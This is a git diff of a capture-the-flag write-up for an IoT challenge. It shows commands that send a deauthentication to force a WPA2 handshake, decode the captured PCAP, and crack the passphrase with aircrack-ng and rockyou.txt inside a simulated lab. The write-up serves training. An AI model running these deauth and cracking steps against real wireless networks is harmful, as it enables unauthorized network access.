write-up: IoT/Cr4cK_w1f1/README.md

2026-03-26 17:33:30 +00:00 · 2026-03-26 17:33:30 +00:00 · 1b13d8fe65
commit 1b13d8fe65
parent 94c42f707a
1 changed files with 75 additions and 22 deletions
--- a/IoT/Cr4cK_w1f1/README.md
+++ b/IoT/Cr4cK_w1f1/README.md
@ -1,27 +1,62 @@
-# Cr4ck_W1F1 — Solution
+# Cr4cK_W1F1
-**Difficulty:** Medium | **Category:** IoT | **Flag:** `CTF{CR4CK_W1F1_EXAMPLE}`
+| Field | Value |
 |-------|-------|
 | Category | IoT |
 | Difficulty | Medium |
 | Points | TBD |
 | Author | Eun0us |
 | CTF | Espilon 2026 |
-> **Note:** Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement.
+---
-## Overview
+## Description
-UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis
+You recover a UART access on a red team WiFi sniffer tool.
-connecte au réseau pour lire le flag.
+Analyze the captured data to recover the WiFi password, then connect to the network and
 retrieve the flag.
- **TX (port 1111)**: Read only
+- TX (read UART): port 1111
- **RX (port 2222)**: Write only
+- RX (write UART): port 2222
-## Steps
+---
-1. Ouvrir deux terminaux :
+## TL;DR
 Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART
 output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find
 the passphrase `sunshine`, then connect and read the flag.
 ---
 ## Tools
 | Tool | Purpose |
 |------|---------|
 | `nc` | Connect to UART TX/RX ports |
 | `base64` | Decode the PCAP blob |
 | `aircrack-ng` | Crack WPA2 handshake |
 | `rockyou.txt` | Password wordlist |
 ---
 ## Solution
 ### Step 1 — Open both UART channels
 ```bash
-nc <host> 1111   # TX — lecture
+# Terminal 1 — TX (read output)
-nc <host> 2222   # RX — écriture
+nc <host> 1111
 # Terminal 2 — RX (send commands)
 nc <host> 2222
 ```
-1. Dans RX, démarrer le sniffer et forcer un re-handshake :
+> 📸 `[screenshot: two terminals showing TX output and RX prompt]`
 ### Step 2 — Start the sniffer and force a deauth
 In the RX terminal:
 ```text
 sniffer start
@ -29,38 +64,56 @@ deauth TestNet 02:00:00:aa:00:01
 sniffer stop
 ```
-1. Sur TX, récupérer le bloc PCAP base64 entre les marqueurs :
+The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.
 ### Step 3 — Extract the PCAP from TX
 On the TX terminal, output appears between markers:
 ```text
 PCAP_BASE64_BEGIN
-...
+<base64 data>
 PCAP_BASE64_END
 ```
-Sauvegarder et décoder :
+Copy the base64 lines to a file and decode:
 ```bash
 base64 -d handshake.b64 > handshake.pcap
 ```
-1. Cracker la capture :
+> 📸 `[screenshot: TX output showing the PCAP_BASE64 markers]`
 ### Step 4 — Crack the WPA2 handshake
 ```bash
 aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
 # → KEY FOUND! [ sunshine ]
 ```
-1. Se connecter au réseau et lire le flag :
+Output:
 ```
 KEY FOUND! [ sunshine ]
 ```
 > 📸 `[screenshot: aircrack-ng finding the key]`
 ### Step 5 — Connect and read the flag
 In the RX terminal:
 ```text
 connect TestNet sunshine
 cat /flag.txt
 ```
 > 📸 `[screenshot: RX terminal returning the flag after connecting to the network]`
 ---
 ## Flag
 `CTF{CR4CK_W1F1_EXAMPLE}`
-## Author
+> Note: This challenge was still being finalized at time of writing. The flag above is
-
+> a placeholder; the real flag will be updated before deployment.
 Eun0us